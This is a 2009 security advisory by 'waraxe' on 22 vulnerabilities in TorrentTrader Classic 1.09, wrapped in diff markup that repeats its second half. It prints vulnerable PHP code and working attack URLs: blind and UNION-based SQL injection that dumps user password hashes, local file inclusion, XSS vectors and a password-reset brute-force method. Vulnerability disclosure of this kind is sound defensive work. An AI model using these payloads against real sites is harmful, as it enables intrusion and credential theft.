-  1. unsanitized user submitted parameter "delreq" is used in sql query
-Preconditions:
-  1. attacker must be logged in as valid user
-
------------------------------[source code start]-------------------------------
-if (get_user_class() > UC_JMODERATOR){
-...
-$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
-$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
-$res2=mysql_query($do2);
-$res=mysql_query($do);
-...
-} else {
-foreach ($_POST[delreq] as $del_req){
-$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
-if ($delete_ok){
-$do="DELETE FROM requests WHERE id IN ($del_req)";
-$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";
-...
-function checkRequestOwnership ($user, $delete_req){
-$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
------------------------------[source code end]---------------------------------
-
-
-
-14. Sql Injection vulnerability in "takestaffmess.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "clases" is used in sql query
-Preconditions:
-  1. attacker must have admin privileges
-
------------------------------[source code start]-------------------------------
-adminonly();
-...
-$updateset = $_POST['clases'];
-
-$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");
------------------------------[source code end]---------------------------------
-
-
-15. Sql Injection vulnerability in "takewarndisable.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "warndisable" is used in sql query
-Preconditions:
-  1. attacker must have at least moderator privileges
-
------------------------------[source code start]-------------------------------
-jmodonly();
-...
-if ($disable != '') {
-$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
-$res=mysql_query($do);
-}
-
-if ($enable != '') {
-$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
-$res = mysql_query($do);
-}
------------------------------[source code end]---------------------------------
-
-
-16. Sql Injection vulnerability in "today.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. uninitialized variable "limit" is used in sql query
-Preconditions:
-  1. none
-Comments:
-  1. seems hard to exploit
-
-Test:
-
-http://localhost/torrenttrader109/today.php?limit=waraxe
-
-Result: 
-
-"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
-resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"
-
-
-17. Sql Injection vulnerability in "torrents-details.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. uninitialized variable "where" is used in sql query
-Preconditions:
-  1. none
-
------------------------------[source code start]-------------------------------
-//speed mod
-$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
-WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
-or sqlerr(__FILE__, __LINE__); 
------------------------------[source code end]---------------------------------
-
-Exploitation is possible using blind sql injection methods.
-
-Test 1:
-
-http://localhost/torrenttrader109/torrents-details.php?id=1&
-where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
-
-Result: normal page
-
-Test 2:
-
-http://localhost/torrenttrader109/torrents-details.php?id=1&
-where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
-
-Result: "MYSQL Error has occurred!"
-
-
-18. Sql Injection vulnerability in "admin-delreq.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. uninitialized variable "categ" is used in sql query
-Preconditions:
-  1. attacker must have at least moderator privileges
-
------------------------------[source code start]-------------------------------
-jmodonly();
-...
-$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
-requests.id, requests.userid, requests.request, requests.added, categories.name
-as cat FROM requests inner join categories on requests.cat = categories.id
-inner join users on requests.userid = users.id
-$categ  order by requests.request $limit") or print(mysql_error());
------------------------------[source code end]---------------------------------
-
-Test:
-
-http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe
-
-Result: "You have an error in your SQL syntax; check the manual that corresponds
-to your MySQL server version for the right syntax to use
-near 'waraxe order by requests.request LIMIT 0,50' at line 1"
-
-
-19. Persistent XSS in "viewrequests.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameters used in response html generation
-Preconditions:
-  1. attacker must be logged in as valid user
-
-Steps for testing:
-
-a) attacker submits request:
-
-http://localhost/torrenttrader109/requests.php
-
-In "Title" field let's insert some javascript:
-
-testtitle
-
-b) admin will browse requests:
-
-http://localhost/torrenttrader109/viewrequests.php
-
-and previously planted javascript will be executed in admin session context.
-
-
-
-20. Persistent XSS in logging funtionality
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameters used in response html generation
-Preconditions:
-  1. attacker must be logged in as valid user
-
-Steps for testing:
-
-a) attacker uploads torrent file:
-
-http://localhost/torrenttrader109/torrents-upload.php
-
-In "Torrent Name" field let's insert some javascript:
-
-testname
-
-Upload is successful: "The torrent has been uploaded successfully!"
-
-b) admin will browse logs:
-
-http://localhost/torrenttrader109/admin.php?act=view_log
-
-and previously planted javascript will be executed in admin session context.
-
-
-21. Local File Inclusion vulnerability in "backend/admin-functions.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. URI case-insensitivity on Windows platform
-Preconditions:
-  1. Windows platform
-  2. register_globals=on
-  3. magic_quotes_gpc=off
-
------------------------------[source code start]-------------------------------
-if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
-require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
------------------------------[source code end]---------------------------------
-
-As we can see from source code snippet above, direct access to script is blocked.
-In case of Windows and Apache combination URI handling is case-insensitive.
-In other hand "strpos()" function, used for access control, is case-sensitive.
-So this script can be directly executed, if we change some characters in script's
-filename to uppercase:
-
-http://localhost/torrenttrader109/backend/Admin-functions.php
-
-"Warning: require_once(./themes//block.php) [function.require-once]:
-failed to open stream: No such file or directory in
-C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"
-
-If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:
-
-http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
-
-
-22. Reflected XSS in multiple scripts
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Examples:
-
-http://localhost/torrenttrader109/themes/default/footer.php?ttversion=
-http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">
-http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=
-http://localhost/torrenttrader109/visitorstoday.php?todayactive=
-http://localhost/torrenttrader109/visitorsnow.php?activepeople=
-http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
-http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">
-
-
-Greetings:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
-to all active waraxe.us forum members and to anyone else who know me!
-
-
-Contact:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-come2waraxe@yahoo.com
-Janek Vind "waraxe"
-
-Waraxe forum:  http://www.waraxe.us/forums.html
-Personal homepage: http://www.janekvind.com/
----------------------------------- [ EOF ] ------------------------------------
-
-# milw0rm.com [2009-06-15]
+[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
+===============================================================================
+
+Author: Janek Vind "waraxe"
+Date: 15. June 2009
+Location: Estonia, Tartu
+Web: http://www.waraxe.us/advisory-74.html
+
+
+Description of vulnerable software:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
+BitTorrent tracker. Featuring integrated forums and plenty of administration
+options. Please visit www.torrenttrader.org for the support forums.
+
+http://sourceforge.net/projects/torrenttrader 
+
+
+List of found vulnerabilities
+===============================================================================
+
+1. Sql Injection vulnerability in "account-inbox.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "origmsg" is used in sql query
+Preconditions:
+  1. attacker must be logged in as valid user
+
+Test:
+
+http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
+
+Result: "MYSQL Error has occurred!"
+
+-----------------------------[source code start]-------------------------------
+if ($msg) {
+  $msg = trim($msg);
+
+  $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
+  $user = mysql_fetch_assoc($res);
+  if (!$user)
+    $message = "Username not found.";
+...
+
+    if ($origmsg && $delete == "yes")
+       mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
+-----------------------------[source code end]---------------------------------
+
+
+2. Weak password generation algorithm in "account-recover.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. generated password is weak and can be easily bruteforced
+Preconditions:
+  1. attacker must know email address associated with target's account
+
+Torrenttrader contains password reseting functionality:
+
+http://localhost/torrenttrader109/account-recover.php
+
+Anyone can initiate password reset, only condition is, that target's email
+address must be know. Torrenttrader will check email address and after successful
+validation new, temporal password will be generated and sent to that email address.
+Specific autogenerated password appears to be random number between 10000 and 50000,
+so basically there can be only 40000 possible temporal passwords. It's easy to
+write bruteforce script, which will try all possible password combinations.
+This process can take couple of hours or more, but eventually the password will
+be guessed and target account becomes compromised.
+
+-----------------------------[source code start]-------------------------------
+if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
+  $email = trim($_POST["email"]);
+  if (!validemail($email)) {
+	$msg = "" . NOT_VAILD_EMAIL . "";
+	$kind = "Error";
+  }
+  else {
+	  $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
+	  $arr = mysql_fetch_assoc($res);
+
+	  if (!$arr) {
+	    $msg = "" . EMAIL_INVALID . "";
+	    $kind = "Error";
+	  }
+...
+	  if ($arr) {
+	  	$newpassword = rand(10000, 50000);
+	  	$md5pass = md5($newpassword);
+-----------------------------[source code end]---------------------------------
+
+
+3. Unauthorized database backup vulnerability in "backup-database.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. missing access control
+Preconditions:
+  1. mysqldump utility must be available
+  2. gzip utility must be available
+  3. target directory must be writable
+  4. database name must be known in order to successfully guess archive filename
+
+Test:
+
+http://localhost/torrenttrader109/backup-database.php
+
+Resulting message: "Database backup successful, entry inserted into database."
+
+-----------------------------[source code start]-------------------------------
+system(sprintf(    
+  'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',                                    
+  $host,
+  $user,
+  $pass,
+  $db,
+  getenv('DOCUMENT_ROOT'),
+  $backupdir,
+  $db,
+  $day,
+  $month,
+  $year
+ )); 
+-----------------------------[source code end]---------------------------------
+
+Attacker is able to create database backup and resulting "gz" archive's
+filename can be guessed, if attacker knows database name. This file is also
+directly downloadable from website. Example download URI:
+
+http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
+
+As result information leakage exists. For example, attacker can fetch admin
+credentials from backed up database.
+
+
+4. Sql Injection vulnerability in "browse.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. uninitialized variable "wherecatin" is used in sql query
+Preconditions:
+  1. none
+
+Test:
+
+http://localhost/torrenttrader109/browse.php?wherecatin=waraxe
+
+Result:
+
+Unknown column 'waraxe' in 'where clause'
+
+-----------------------------[source code start]-------------------------------
+if (count($wherecatina) > 1)
+$wherecatin = implode(",",$wherecatina);
+elseif (count($wherecatina) == 1)
+$wherea[] = "category = $wherecatina[0]";
+...
+if ($wherecatin)
+$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";
+
+if ($where != "")
+$where = "WHERE $where";
+
+$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
+-----------------------------[source code end]---------------------------------
+
+This specific sql injection vulneraility can be exploited using blind attack
+methods. If there is one or more active torrents in database, then usable is
+attack pattern below:
+
+http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
+
+and we see found torrents.
+
+http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
+
+"No torrents were found based on your search criteria."
+
+In this way attacker is able to ask boolean questions from database and retrieve
+needed information bit by bit - example of classical blind sql injection.
+
+If there is no active torrents in database, then induced sql errors method can be used.
+
+http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
+
+"Subquery returns more than 1 row"
+
+http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
+
+"No torrents were found based on your search criteria."
+
+
+5. Information leakage in "check.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. missing access control
+Preconditions:
+  1. none
+
+Test:
+
+http://localhost/torrenttrader109/check.php
+
+This script is originally meant to be used by installer and lately by admins.
+Because of lacking access control attacker is able to use it for gathering some
+useful information about target system - full path to webroot, file and directory
+permissions of specific files, couple of php settings.
+
+6. Sql Injection vulnerability in "delreq.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "categ" is used in sql query
+Preconditions:
+  1. attacker must have at least super moderator privileges (user class > 3)
+Comments:
+  1. very easy to exploit
+
+Test:
+
+http://localhost/torrenttrader109/delreq.php?categ=waraxe
+
+Result:
+
+You have an error in your SQL syntax; check the manual that corresponds to your
+MySQL server version for the right syntax to use near
+'waraxe order by requests.request LIMIT 0,50' at line 1
+
+Test 2:
+
+http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
+
+and we can see all usernames, password hashes and emails from database.
+
+
+7. Sql Injection vulnerability in "index.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "choice" is used in sql query
+Preconditions:
+  1. attacker must be logged in as valid user
+  2. there must exist at least one poll
+
+Testing needs custom written html form:
+-------------------------------------------------------------------------------
+
    
+
    
+
+
+
    
+-------------------------------------------------------------------------------
+
+Result: "MYSQL Error has occurred!"
+
+-----------------------------[source code start]-------------------------------
+if ($_SERVER["REQUEST_METHOD"] == "POST")
+{
+  $choice = $_POST["choice"];
+  if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
+  {
+    $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
+    $arr = mysql_fetch_assoc($res) or die("No poll");
+    $pollid = $arr["id"];
+    $userid = $CURUSER["id"];
+    $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
+    $arr = mysql_fetch_assoc($res);
+    if ($arr) die("Dupe vote");
+    mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
+-----------------------------[source code end]---------------------------------
+
+
+8. Sql Injection vulnerability in "modrules.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "id" is used in sql query
+Preconditions:
+  1. attacker must have at least moderator privileges
+
+Testing needs custom written html form:
+-------------------------------------------------------------------------------
+
    
+
    
+
+
+
+
+
+
+
    
+-------------------------------------------------------------------------------
+
+Test result: "MYSQL Error has occurred!"
+
+-----------------------------[source code start]-------------------------------
+elseif ($_GET["act"]=="edited"){
+$id = $_POST["id"];
+$title = sqlesc($_POST["title"]);
+$text = sqlesc($_POST["text"]);
+$public = sqlesc($_POST["public"]);
+$class = sqlesc($_POST["class"]);
+mysql_query("update rules set title=$title, text=$text, public=$public,
+  class=$class where id=$id") or sqlerr(__FILE__,__LINE__);
+-----------------------------[source code end]---------------------------------
+  
+
+9. Information leakage in "phpinfo.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. missing access control
+Preconditions:
+  1. none
+
+Test:
+
+http://localhost/torrenttrader109/phpinfo.php
+
+-----------------------------[source code start]-------------------------------
+
+-----------------------------[source code end]---------------------------------
+
+This script can be used by attacker to obtain information from php function
+phpinfo(). Access to such script must be limited to admins, but currently there
+is not any access control at all.
+
+
+10. Sql Injection vulnerabilities in "report.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "user" is used in sql query
+  2. unsanitized user submitted parameter "torrent" is used in sql query
+  3. unsanitized user submitted parameter "forumid" is used in sql query
+  4. unsanitized user submitted parameter "forumpost" is used in sql query
+Preconditions:
+  1. attacker must be logged in as valid user
+
+Two proof-of-concept tests below are using parameter "user".
+
+Test 1 needs custom written html form:
+-------------------------------------------------------------------------------
+
    
+
    
+
+
+
+
    
+-------------------------------------------------------------------------------
+
+Test result: "MYSQL Error has occurred!"
+
+Test 2 needs custom written html form:
+-----------------------------[source code start]-------------------------------
+
    
+
    
+
+
+
+
    
+-----------------------------[source code end]---------------------------------
+  
+Test result: "You have already reported user ..."
+
+It's classical blind sql injection exploitation method and allows attacker to
+fetch information from database bit by bit by asking boolean questions.
+
+Other three sql injection vulnerabilities in "report.php" involve user submitted
+parameters "torrent", "forumid" and "forumpost" and exploitation can be done in
+similar way as seen above.
+
+
+11. Sql Injection vulnerability in "take-deletepm.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "delmp" is used in sql query
+Preconditions:
+  1. attacker must have admin privileges
+
+-----------------------------[source code start]-------------------------------
+if(isset($_POST["delmp"])) {
+	$do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
+	$res=mysql_query($do)
+-----------------------------[source code end]---------------------------------
+
+
+12. Sql Injection vulnerability in "takedelreport.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "delreport" is used in sql query
+Preconditions:
+  1. attacker must have at least moderator privileges
+
+-----------------------------[source code start]-------------------------------
+jmodonly();
+
+$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 
+  AND id IN (" . implode(", ", $_POST[delreport]) . ")");
+-----------------------------[source code end]---------------------------------
+
+
+13. Sql Injection vulnerability in "takedelreq.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "delreq" is used in sql query
+Preconditions:
+  1. attacker must be logged in as valid user
+
+-----------------------------[source code start]-------------------------------
+if (get_user_class() > UC_JMODERATOR){
+...
+$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
+$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
+$res2=mysql_query($do2);
+$res=mysql_query($do);
+...
+} else {
+foreach ($_POST[delreq] as $del_req){
+$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
+if ($delete_ok){
+$do="DELETE FROM requests WHERE id IN ($del_req)";
+$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";
+...
+function checkRequestOwnership ($user, $delete_req){
+$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
+-----------------------------[source code end]---------------------------------
+
+
+
+14. Sql Injection vulnerability in "takestaffmess.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "clases" is used in sql query
+Preconditions:
+  1. attacker must have admin privileges
+
+-----------------------------[source code start]-------------------------------
+adminonly();
+...
+$updateset = $_POST['clases'];
+
+$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");
+-----------------------------[source code end]---------------------------------
+
+
+15. Sql Injection vulnerability in "takewarndisable.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameter "warndisable" is used in sql query
+Preconditions:
+  1. attacker must have at least moderator privileges
+
+-----------------------------[source code start]-------------------------------
+jmodonly();
+...
+if ($disable != '') {
+$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
+$res=mysql_query($do);
+}
+
+if ($enable != '') {
+$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
+$res = mysql_query($do);
+}
+-----------------------------[source code end]---------------------------------
+
+
+16. Sql Injection vulnerability in "today.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. uninitialized variable "limit" is used in sql query
+Preconditions:
+  1. none
+Comments:
+  1. seems hard to exploit
+
+Test:
+
+http://localhost/torrenttrader109/today.php?limit=waraxe
+
+Result: 
+
+"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
+resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"
+
+
+17. Sql Injection vulnerability in "torrents-details.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. uninitialized variable "where" is used in sql query
+Preconditions:
+  1. none
+
+-----------------------------[source code start]-------------------------------
+//speed mod
+$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
+WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
+or sqlerr(__FILE__, __LINE__); 
+-----------------------------[source code end]---------------------------------
+
+Exploitation is possible using blind sql injection methods.
+
+Test 1:
+
+http://localhost/torrenttrader109/torrents-details.php?id=1&
+where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
+
+Result: normal page
+
+Test 2:
+
+http://localhost/torrenttrader109/torrents-details.php?id=1&
+where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
+
+Result: "MYSQL Error has occurred!"
+
+
+18. Sql Injection vulnerability in "admin-delreq.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. uninitialized variable "categ" is used in sql query
+Preconditions:
+  1. attacker must have at least moderator privileges
+
+-----------------------------[source code start]-------------------------------
+jmodonly();
+...
+$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
+requests.id, requests.userid, requests.request, requests.added, categories.name
+as cat FROM requests inner join categories on requests.cat = categories.id
+inner join users on requests.userid = users.id
+$categ  order by requests.request $limit") or print(mysql_error());
+-----------------------------[source code end]---------------------------------
+
+Test:
+
+http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe
+
+Result: "You have an error in your SQL syntax; check the manual that corresponds
+to your MySQL server version for the right syntax to use
+near 'waraxe order by requests.request LIMIT 0,50' at line 1"
+
+
+19. Persistent XSS in "viewrequests.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameters used in response html generation
+Preconditions:
+  1. attacker must be logged in as valid user
+
+Steps for testing:
+
+a) attacker submits request:
+
+http://localhost/torrenttrader109/requests.php
+
+In "Title" field let's insert some javascript:
+
+testtitle
+
+b) admin will browse requests:
+
+http://localhost/torrenttrader109/viewrequests.php
+
+and previously planted javascript will be executed in admin session context.
+
+
+
+20. Persistent XSS in logging funtionality
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. unsanitized user submitted parameters used in response html generation
+Preconditions:
+  1. attacker must be logged in as valid user
+
+Steps for testing:
+
+a) attacker uploads torrent file:
+
+http://localhost/torrenttrader109/torrents-upload.php
+
+In "Torrent Name" field let's insert some javascript:
+
+testname
+
+Upload is successful: "The torrent has been uploaded successfully!"
+
+b) admin will browse logs:
+
+http://localhost/torrenttrader109/admin.php?act=view_log
+
+and previously planted javascript will be executed in admin session context.
+
+
+21. Local File Inclusion vulnerability in "backend/admin-functions.php"
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Reasons:
+  1. URI case-insensitivity on Windows platform
+Preconditions:
+  1. Windows platform
+  2. register_globals=on
+  3. magic_quotes_gpc=off
+
+-----------------------------[source code start]-------------------------------
+if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
+require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
+-----------------------------[source code end]---------------------------------
+
+As we can see from source code snippet above, direct access to script is blocked.
+In case of Windows and Apache combination URI handling is case-insensitive.
+In other hand "strpos()" function, used for access control, is case-sensitive.
+So this script can be directly executed, if we change some characters in script's
+filename to uppercase:
+
+http://localhost/torrenttrader109/backend/Admin-functions.php
+
+"Warning: require_once(./themes//block.php) [function.require-once]:
+failed to open stream: No such file or directory in
+C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"
+
+If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:
+
+http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
+
+
+22. Reflected XSS in multiple scripts
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Examples:
+
+http://localhost/torrenttrader109/themes/default/footer.php?ttversion=
+http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">
+http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=
+http://localhost/torrenttrader109/visitorstoday.php?todayactive=
+http://localhost/torrenttrader109/visitorsnow.php?activepeople=
+http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
+http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">
+
+
+Greetings:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
+to all active waraxe.us forum members and to anyone else who know me!
+
+
+Contact:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+come2waraxe@yahoo.com
+Janek Vind "waraxe"
+
+Waraxe forum:  http://www.waraxe.us/forums.html
+Personal homepage: http://www.janekvind.com/
+---------------------------------- [ EOF ] ------------------------------------
+
+# milw0rm.com [2009-06-15]
